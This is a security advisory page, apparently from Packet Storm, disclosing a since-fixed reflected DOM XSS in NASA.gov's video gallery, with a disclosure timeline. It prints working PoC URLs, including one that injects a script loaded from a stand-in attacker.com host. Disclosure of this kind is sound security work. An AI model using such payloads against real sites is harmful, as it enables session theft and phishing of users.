exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

NASA.gov Cross Site Scripting

NASA.gov Cross Site Scripting
Posted Apr 1, 2015
Authored by Yann CAM

NASA.gov suffered from a cross site scripting vulnerability.

tags | exploit, xss
SHA-256 | 1940dedc996e0a901e36e9ad94a1152f1b3844fb6cf1697bc6d72173b54ec02d

NASA.gov Cross Site Scripting

Change Mirror Download
######################################################################
# Exploit Title: NASA.gov main-domain DOM-XSS
# Date: 01/04/2015
# Author: Yann CAM - Georges TAUPIN @ Synetis - ASafety
# Vendor or Software Link: www.nasa.gov
# Version: /
# Category: DOM-XSS
# Google dork:
# Tested on: NASA.gov main-domain
######################################################################

NASA description :
=======================================================================================

The National Aeronautics and Space Administration (NASA) is the United States government agency responsible for the civilian space program as well as
aeronautics and aerospace research.

There are several sub-domains and independent projects within NASA.
Those affected by this advisory are :

- NASA’s video gallery on main domain : DOM Cross-Site Scripting (RXSS)


Vulnerability description :
=======================================================================================
Reflected DOM XSS are available in nasa.gov main-domain above.
Through this kind of vulnerability, an attacker could tamper with page rendering, redirect victims to fake NASA portals, or capture NASA's users credentials such cookies.
These reflected XSS are on GET variables and are not properly sanitized before being used in page.


NASA’s main portal - video gallery - PoC :
=======================================================================================

- Proof of Concept (PoC), canonical DOM-XSS "alert()", tested on Firefox 35, Chrome 39 and IE 11:

http://www.nasa.gov/multimedia/nasatv/on_demand_video.html?param&_id&_title=<img src%3Dx onerror%3Dalert(/RXSS/) />

or the same fully-url-encoded :

http://www.nasa.gov/multimedia/nasatv/on_demand_video.html?param&_id&_title=%3c%69%6d%67%20%73%72%63%3d%78%20%6f%6e%65%72%72%6f%72%3d%61%6c%65%72%74%28%2f%52%58%53%53%2f%29%20%2f%3e

The previous link generates a JavaScript "alert()" box in the browser context.

- Proof of Concept (PoC), canonical DOM-XSS "loading third party JS script", tested on Firefox 35, Chrome 39 and IE 11:

http://www.nasa.gov/multimedia/nasatv/on_demand_video.html?param&_id&_title=<img src%3Dx onerror%3D"var s%3Ddocument.createElement('script');s.setAttribute('src','http://attacker.com/x.js');document.getElementsByTagName('head').item(0).appendChild(s);" />


Screenshots :
=======================================================================================
- http://www.asafety.fr/data/20150124-NASA.gov-RXSS_001.png
- http://www.asafety.fr/data/20150124-NASA.gov-RXSS_003.png
- http://www.asafety.fr/data/20150124-NASA.gov-RXSS_004.png


Solution:
=======================================================================================

Fixed by NASA Portal's team.


Additional resources :
=======================================================================================

- http://www.nasa.gov/
- https://www.owasp.org/index.php/DOM_Based_XSS
- http://www.asafety.fr/vuln-exploit-poc/contribution-nasa-gov-portail-principal-dom-xss
- http://www.synetis.com


Report timeline :
=======================================================================================

2015-01-25 : NASA Portal's team was alerted by email through "contact form".
2015-01-26 : NASA Portal's team fixed the vulnerability
2015-04-01 : Public advisory

Credits :
=======================================================================================

88888888
88 888 88 88
888 88 88
788 Z88 88 88.888888 8888888 888888 88 8888888.
888888. 88 88 888 Z88 88 88 88 88 88 88
8888888 88 88 88 88 88 88 88 88 888
888 88 88 88 88 88888888888 88 88 888888
88 88 88 8. 88 88 88 88 88 888
888 ,88 8I88 88 88 88 88 88 88 .88 .88
?8888888888. 888 88 88 88888888 8888 88 =88888888
888. 88
88 www.synetis.com
8888 Consulting firm in management and information security

Yann CAM - Georges TAUPIN - Security Consultants @ Synetis | ASafety

--
SYNETIS | ASafety
CONTACT: www.synetis.com | www.asafety.fr | www.georgestaupin.com
Login or Register to add favorites

File Archive:

January 2023

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Jan 1st
    0 Files
  • 2
    Jan 2nd
    13 Files
  • 3
    Jan 3rd
    5 Files
  • 4
    Jan 4th
    5 Files
  • 5
    Jan 5th
    9 Files
  • 6
    Jan 6th
    5 Files
  • 7
    Jan 7th
    0 Files
  • 8
    Jan 8th
    0 Files
  • 9
    Jan 9th
    18 Files
  • 10
    Jan 10th
    31 Files
  • 11
    Jan 11th
    30 Files
  • 12
    Jan 12th
    33 Files
  • 13
    Jan 13th
    25 Files
  • 14
    Jan 14th
    0 Files
  • 15
    Jan 15th
    0 Files
  • 16
    Jan 16th
    7 Files
  • 17
    Jan 17th
    25 Files
  • 18
    Jan 18th
    38 Files
  • 19
    Jan 19th
    6 Files
  • 20
    Jan 20th
    21 Files
  • 21
    Jan 21st
    0 Files
  • 22
    Jan 22nd
    0 Files
  • 23
    Jan 23rd
    24 Files
  • 24
    Jan 24th
    68 Files
  • 25
    Jan 25th
    22 Files
  • 26
    Jan 26th
    20 Files
  • 27
    Jan 27th
    17 Files
  • 28
    Jan 28th
    0 Files
  • 29
    Jan 29th
    0 Files
  • 30
    Jan 30th
    0 Files
  • 31
    Jan 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Hosting By
Rokasec
close